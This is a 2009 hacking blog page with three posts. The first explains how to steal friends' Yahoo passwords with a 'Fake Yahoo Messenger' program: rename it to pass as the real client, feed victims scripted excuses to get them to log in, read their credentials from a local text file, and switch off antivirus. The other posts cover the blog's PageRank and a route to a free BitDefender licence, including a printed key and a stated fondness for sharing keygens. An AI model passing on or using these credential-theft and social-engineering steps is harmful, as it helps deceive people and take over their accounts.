Sunday, April 12, 2009

How to Hack Yahoo Accounts ?


When i was searching on the net i found many of the people interested in Hacking Yahoo Passwords and many of them asking this type of question in different Form but they won't get any proper reply so i decided why not to write a article about Hacking Yahoo Account Passwords.

Hacking Yahoo Accounts is easy but it is possible only when HE(Target Account to be Hacked) is your friend.

I found one password Hacking program for Yahoo. Yahoo Account can be hacked by using the program called Fake Yahoo Messenger.

Fake Yahoo Messenger:

It is a software appearing like yahoo messenger(old version type)

and when ever some one trying to Log In to there account by this fake yahoo messenger the password will be saved in your PC and also they won't be able to log in to there account because it always show an error as shown below

Steps for Hacking Yahoo Messenger passwords:

1. Install Microsoft.Net Frame Work i think almost everyone has this software in their computer if not click here to download.

2. Download Free tool for hacking yahoo accounts(fake yahoo messenger)

File Size
: 30.54 KB

3. Rename Fake Yahoo Messenger to Yahoo Messenger

4. Tell your friends to Log In.

Hint: If any of your friends asked why your using old version then tell this reasons...

* Faster load

* No ads inside the chat room etc(As i already told that they won't able to log in to there account by using this software than how can they see inside is there any ads ?)

* Or else tell them this is a new beta version and etc..

It all depends on your skills to Log in your friends...

5. After your friends log in open c:\yahoo.txt and that's your friend Yahoo Id and Password.

NOTE: You need to disable your ANTI VIRUS when all this process is going on.

Feel free to comment about your opinion... If you like please Digg it... and also don't forget to subscribe to our newsletters.


Friday, April 10, 2009

Google Update PageRank-TrUe HaCkinG got PR1 [ once again google updated Now we PR2 ]


When i was chatting one of my friend told that Google has updated the PageRank without neglecting i just opened a PageRank checker site & i entered my blog URL after checking i just shocked seeing the result because my blog got PAGERANK 1 [ NOW PAGERANK 2 ]even though it is a new blog & Google gave a page rank 1 .

How i got this rank within a few months..??

Here are the few things..

1. I think this is because quality & content of my blog...

2. Commenting on other blog with giving link to your blog.

3. Adopting SEO tips.

4. Link Exchange .. this play a very good role to increase your traffic to your blog.

5. and few other activities..

I need to say Thanks to Google : )

and i need to say very very Thanks to my visitors too...

Keep Visiting and droping comments!

You can check you blogs pagerank below and don’t forget to share your blogs pagerank with us via your valuable comments!

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This free page rank checking tool is powered by Page Rank Checker service


Thursday, April 2, 2009

How to get a Genuine License for BitDefender Internet Security 2009


As i always like to share good software with Keygens or Licence so here in this post i would like to share How to get a GENUINE LICENCE of BitDefender Internet Security 2009..!! yes this is true you can get Genuine licence of cost $39.95 for free this offer may close soon so please get a Licence as soon as possible for getting this licence follow the simple steps as show below..

1. Visit this page

2. On the left hand of the page, enter your Name in 1, your valid e-mail address in 2 and click the Enviar Solicitud button.

3. Now check your email box for an email from ENVIARAUNAMIGO.COM with the subject Licencia antivirus de regalo. The license key is mentioned right after the sentence “Su número de licencia es”.



Ha conseguido su REGALO

Antivirus Bit-Defender con Licencia de 1 AÑO.
Su número de licencia es: 73D1E898E9B2DDA592BA

4. You can download the latest version of BitDefender Internet Security 2009 here

Enjoy 1 year Free Licence...


Creative Commons License
Hacking by TrUe HaCkinG is licensed under a Creative Commons Attribution-Noncommercial 2.5 India License.
Based on a work at
Permissions beyond the scope of this license may be available at